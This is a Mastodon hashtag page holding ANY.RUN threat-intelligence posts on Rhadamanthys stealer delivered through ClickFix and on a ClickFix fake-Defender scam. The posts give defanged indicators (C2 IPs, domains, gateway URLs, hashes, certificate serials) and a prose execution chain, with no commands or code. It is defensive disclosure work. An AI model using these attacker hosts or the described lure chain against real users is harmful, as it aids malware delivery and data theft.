ANY.RUN<p><a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IOCs</span></a>:<br>SHA256:<br>560afd97f03f2ed11bf0087d551ae45f2046d6d52f0fa3d7c1df882981e8b346</p><p>8b079bae684fd287c605de8acae338401a76a412c6a802faf2cf6e9ec0cf6224</p><p>0ba3b2871e0ad3b4fba615ea76e2d5f7cefa80e87468c6dcfc9b44feb1e5ea7a</p><p>C2dd4543678f514b5323944993552c106a3d250b0c35cf16c2bb2171ab0a0199</p><p>C23f6a4286dc18bbf1ff06420357da1af1132dddf37ad6f51d9915fccca6c97e</p><p>File names & directories:<br>Shields.msi</p><p>%USERPROFILE%\AppData\Local\Programs\Advanced PDF Shaper Ultimate\LdVBoxSVC.exe</p><p>C:\WINDOWS\system32\openwith.exe</p><p>URLs:<br>hxxps[:]//84.200[.]80.8/gateway/6caqmphx.fan5l<br>hxxps[:]//zerontwoposh[.]live/gateway/n5eepk7n.2a6s4</p><p>TLS Certificates:</p><p>SN: 29769a39032fdff8 | Thumb: 6f13c27a9150db7d02e1e1ff849921cc2bb0754e<br>SN: 3ac75d9f42ced25b2c4534f40d08b41ffefe4ab | Thumb: b938263deb95997f9d47ce9ef9817b5def90eafa</p><p>SN: 3b5db13bb882d9c4 | Thumb: f2b2e768359891f0543cd830d728c923bfc3c307<br>C2 JARM fingerprint:</p><p>3fd3fd20d0000000003fd3fd3fd3fd9c542afc474937e300923d7c192419b1</p><p><a href="https://infosec.exchange/tags/MITRE" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MITRE</span></a> Techniques:<br>Phishing (T1566)<br>User Execution: Malicious Copy and Paste (T1204.004)<br>System Binary Proxy Execution: Msiexec (T1218.007)<br>Virtualization/Sandbox Evasion: System Checks (T1497.001)<br>Hijack Execution Flow (T1574)<br>Obfuscated Files or Information: Steganography (T1027.003)</p>
social.wildeboer.net is one of the many independent Mastodon servers you can use to participate in the fediverse.
Mastodon instance for people with Wildeboer as their last name
Administered by:
Server stats:
2active users
social.wildeboer.net: About · Profiles directory · Privacy policy
Mastodon: About · Get the app · Keyboard shortcuts · View source code · v4.4.4
#iocs
0 posts · 0 participants · 0 posts today
ANY.RUN<p>🚨 How <a href="https://infosec.exchange/tags/Rhadamanthys" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Rhadamanthys</span></a> Stealer Slips Past Defenses using ClickFix<br>⚠️ Rhadamanthys is now delivered via ClickFix, combining technical methods and social engineering to bypass automated security solutions, making detection and response especially challenging.<br>👾 While earlier ClickFix campaigns mainly deployed <a href="https://infosec.exchange/tags/NetSupport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>NetSupport</span></a> RAT or <a href="https://infosec.exchange/tags/AsyncRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AsyncRAT</span></a>, this C++ infostealer ranks in the upper tier for advanced evasion techniques and extensive data theft capabilities.</p><p><a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> Sandbox lets SOC teams observe and execute complex chains, revealing evasive behavior and providing intelligence that can be directly applied to detection rules, playbooks, and proactive hunting.</p><p>🔗 Execution Chain:<br>ClickFix ➡️ msiexec ➡️ exe-file ➡️ infected system file ➡️ PNG-stego payload</p><p>In a recent campaign, the phishing domain initiates a ClickFix flow (<a href="https://infosec.exchange/tags/MITRE" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MITRE</span></a> T1566), prompting the user to execute a malicious MSI payload hosted on a remote server. </p><p>🥷 The installer is silently executed in memory (<a href="https://infosec.exchange/tags/MITRE" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MITRE</span></a> T1218.007), deploying a stealer component into a disguised software directory under the user profile.</p><p>The dropped binary performs anti-VM checks (T1497.001) to avoid analysis. </p><p>In later stages, a compromised system file is used to initiate a TLS connection directly to an IP address, bypassing DNS monitoring.</p><p>📌 For encryption, attackers use self-signed TLS certificates with mismatched fields (e.g., Issuer or Subject), creating distinctive indicators for threat hunting and expanding an organization’s visibility into its threat landscape.</p><p>🖼️ The C2 delivers an obfuscated PNG containing additional payloads via steganography (T1027.003), extending dwell time and complicating detection.</p><p>🎯 See execution on a live system and download actionable report: <a href="https://app.any.run/tasks/a101654d-70f9-40a5-af56-1a8361b4ceb0/?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_term=120825&utm_content=linktoservice" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/a101654d-70f</span><span class="invisible">9-40a5-af56-1a8361b4ceb0/?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_term=120825&utm_content=linktoservice</span></a></p><p>🔍 Use these <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> TI Lookup search queries to track similar campaigns and enrich <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IOCs</span></a> with live attack data from threat investigations across 15K SOCs:<br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522clickfix%255C%2522%2522,%2522dateRange%2522:180%7D" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522clickfix%255C%2522%2522,%2522dateRange%2522:180%7D</span></a><br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522rhadamanthys%255C%2522%2522,%2522dateRange%2522:180%7D" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522rhadamanthys%255C%2522%2522,%2522dateRange%2522:180%7D</span></a><br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522netsupport%255C%2522%2522,%2522dateRange%2522:180%7D" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522netsupport%255C%2522%2522,%2522dateRange%2522:180%7D</span></a><br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522asyncrat%255C%2522%2522,%2522dateRange%2522:180%7D" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522asyncrat%255C%2522%2522,%2522dateRange%2522:180%7D</span></a></p><p>👾 IOCs:<br>84.200[.]80.8<br>179.43[.]141.35<br>194.87[.]29.253<br>flaxergaurds[.]com<br>temopix[.]com<br>zerontwoposh[.]live<br>loanauto[.]cloud<br>wetotal[.]net<br>Find more indicators in the comments 💬</p><p>Protect critical assets with faster, deeper visibility into complex threats using <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> 🚀</p><p><a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a></p>
ANY.RUN<p>🚨 New <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> scam targets US users with fake MS Defender and CloudFlare pages.<br>⚠️ The scam page is hosted on a domain registered back in 2006, pretending to be the Indo-American Chamber of Commerce.<br>🎯 The <a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>phishing</span></a> page loads only for US-based victims, as observed during analysis with a residential IP in <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> Sandbox. </p><p>👨💻 Analysis session: <a href="https://app.any.run/browses/50395c46-41f5-4bb3-8205-61262ef4e63d/?utm_source=mastodon&utm_medium=article&utm_campaign=clickfix_scam&utm_term=160425&utm_content=linktoservice" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/browses/50395c46-4</span><span class="invisible">1f5-4bb3-8205-61262ef4e63d/?utm_source=mastodon&utm_medium=article&utm_campaign=clickfix_scam&utm_term=160425&utm_content=linktoservice</span></a></p><p>📍 URL: iaccindia[.]com<br>The page hijacks the full-screen mode and displays a fake “Windows Defender Security Center” popup. </p><p>🎭 It mimics the Windows UI, locks the screen, and displays urgent messages to panic the user. </p><p>Victims are prompted to call a fake tech support number (+1-…), setting the stage for further exploitation. </p><p>🎣 The phishing page may also display a fake CloudFlare message tricking users to execute a <a href="https://infosec.exchange/tags/malicious" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malicious</span></a> Run command. <br>Take a look: <a href="https://app.any.run/tasks/e83a5861-6006-4b1d-aba8-8536dcaa8057/?utm_source=mastodon&utm_medium=article&utm_campaign=clickfix_scam&utm_term=160425&utm_content=linktoservice" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/e83a5861-600</span><span class="invisible">6-4b1d-aba8-8536dcaa8057/?utm_source=mastodon&utm_medium=article&utm_campaign=clickfix_scam&utm_term=160425&utm_content=linktoservice</span></a></p><p><a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IOCs</span></a>: <br>supermedicalhospital[.]com <br>adflowtube[.]com <br>knowhouze[.]com <br>ecomicrolab[.]com <br>javascripterhub[.]com <br>virtual[.]urban-orthodontics[.]com </p><p>Streamline threat analysis for your SOC with <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> 🚀 <br><a href="https://infosec.exchange/tags/ExploreWithANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ExploreWithANYRUN</span></a></p>
TrendingLive feeds
Mastodon is the best way to keep up with what's happening.
Follow anyone across the fediverse and see it all in chronological order. No algorithms, ads, or clickbait in sight.
LoginDrag & drop to upload